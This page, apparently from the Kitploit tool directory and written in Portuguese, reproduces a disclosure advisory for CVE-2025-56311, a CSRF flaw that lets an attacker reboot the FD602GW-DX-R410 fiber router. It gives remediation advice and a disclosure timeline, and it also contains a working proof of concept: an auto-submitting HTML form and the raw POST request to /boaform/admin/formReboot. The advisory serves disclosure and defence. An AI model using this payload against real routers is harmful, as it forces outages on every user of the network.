Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-56311 — Vulnerabilidade de CSRF no roteador FD602GW-DX-R410 permite que atacantes remotos reiniciem o dispositivo por meio de uma requisição POST maliciosa para /boaform/admin/formReboot quando um administrador está autenticado. | Kitploit
Ferramentas/GitHubGitHub/wrathfuldiety/cve-2025-56311
Análise de VulnerabilidadesExploraçãoSegurança WebTestes de PenetraçãoPapers e PesquisaAprendizado e Educação
GitHubwrathfuldiety/cve-2025-56311

CVE-2025-56311

Vulnerabilidade de CSRF no roteador FD602GW-DX-R410 permite que atacantes remotos reiniciem o dispositivo por meio de uma requisição POST maliciosa para /boaform/admin/formReboot quando um administrador está autenticado.

Ver Repositório
2há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-56311: Aviso de Segurança – Vulnerabilidade CSRF na Função de Reinicialização do Roteador FD602GW-DX-R410

Prova de Conceito e Aviso de Segurança para uma vulnerabilidade de Cross-Site Request Forgery (CSRF) na interface administrativa do roteador de fibra FD602GW-DX-R410 (Firmware V2.2.14). O aviso descreve o impacto, o vetor de ataque e as recomendações para remediação.

fd602gw-dx-r410-csrf-advisory

A vulnerabilidade CSRF no roteador FD602GW-DX-R410 permite que atacantes remotos reinicializem o dispositivo por meio de uma solicitação POST maliciosa para /boaform/admin/formReboot quando um administrador está autenticado.


Visão Geral

Uma vulnerabilidade de Cross-Site Request Forgery (CSRF) foi descoberta no console administrativo baseado na web do roteador de fibra FD602GW-DX-R410 (Firmware V2.2.14). O endpoint /boaform/admin/formReboot permite que solicitações POST acionem uma reinicialização completa do dispositivo sem tokens CSRF ou validação de origem. Se um administrador autenticado visitar uma página maliciosa, o roteador pode ser reinicializado remotamente sem consentimento.

  • ID do CVE: CVE-2025-56311
  • Data de Publicação do Aviso: Julho de 2025
  • Descoberto por: Hasanka Amarasinghe (Pesquisador de Segurança Independente)
  • Fornecedor: Shenzhen C-Data Technology Co., Ltd.
  • Produto Afetado: Roteador de Fibra FD602GW-DX-R410
  • Versão do Firmware: V2.2.14 (Build.1918.241111)
  • Versão do Hardware: R410.1B
  • Versão do Bootloader: V3.7-2312181457
  • Servidor Web: Boa/0.93.15
  • Vetor de Acesso: Remoto (O administrador autenticado deve estar conectado)
  • Severidade: Média
  • Pontuação Base CVSS v3.1: 5.4 (Média)

  • Produto Afetado

    • Dispositivo: Roteador de Fibra FD602GW-DX-R410
    • Firmware: V2.2.14 (Build.1918.241111)
    • Componente: Manipulador de Reinicialização - /boaform/admin/formReboot
    • Servidor Web: Boa/0.93.15

    Detalhes da Vulnerabilidade

    • Tipo: Cross-Site Request Forgery (CSRF)
    • Vetor de Ataque: Remoto (o administrador deve estar conectado à sua sessão)
    • Autenticação: Nenhuma exigida para o atacante (sessão de administrador exigida no navegador da vítima)
    • Impacto: Reinicialização não autorizada do dispositivo
    • Persistência de Estado: Sessão sem estado (stateless), provavelmente rastreada via IP ou tokens de sessão internos

    Prova de Conceito (PoC)

    Payload CSRF (HTML)

    root@kitploit:~
    <html>
      <!-- CSRF PoC - generated by Burp Suite Pro -->
      <body>
        <form action="http://192.168.1.1/boaform/admin/formReboot" method="POST">
          <input type="hidden" name="postSecurityFlag" value="+65535" />
          <input type="submit" value="Submit" />
        </form>
        <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
        </script>
      </body>
    </html>
    

    Requisição HTTP

    root@kitploit:~
    POST /boaform/admin/formReboot HTTP/1.1
    Host: 192.168.1.1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 23
    
    postSecurityFlag=+65535
    

    Resposta

    HTTP 200 OK; O roteador reinicia imediatamente.


    Recomendações

    • Implemente tokens CSRF e validação estrita de Origin/Referer em todos os endpoints administrativos.
    • Invalide sessões obsoletas ou órfãs e vincule as sessões a cookies seguros.
    • Considere usar CAPTCHA ou solicitações de confirmação antes de executar ações destrutivas como a reinicialização.
    • Restrinja o acesso à interface administrativa apenas a IPs confiáveis ou redes internas.

    Vetor de Ataque

    • Exige que o administrador do roteador esteja autenticado (conectado).
    • Um atacante induz a vítima a visitar uma página web maliciosa que aciona silenciosamente uma solicitação POST para o endpoint de reinicialização.
    • O roteador aceita a solicitação forjada e reinicia imediatamente, causando negação de serviço.

    Impacto

    • Negação de serviço devido à reinicialização forçada.
    • Perda de disponibilidade de rede para todos os usuários conectados.
    • Possibilidade de combinação com outros problemas (ex.: sequestro de sessão ou XSS) para elevar o impacto.

    Cronograma de Divulgação

    DataAção
    Jun 2025Vulnerabilidade descoberta
    Jun 2025Tentativa de divulgação responsável (sem resposta)
    Jul 2025ID do CVE solicitado à MITRE
    Jul 2025Aviso preparado e aguardando publicação
    Sep 2025CVE atribuído, aviso tornado público

    Referências

    • Fornecedor: Shenzhen C-Data Technology Co., Ltd.
    • Dispositivo: FD602GW-DX-R410
    • Firmware: V2.2.14
    • Aviso no GitHub: https://github.com/wrathfulDiety/CVE-2025-56311

    Aviso Legal

    Este aviso é fornecido para fins educacionais e de conscientização sobre segurança. O autor não se responsabiliza pelo uso indevido. Todos os testes foram realizados em um ambiente controlado.

    Baixar ferramenta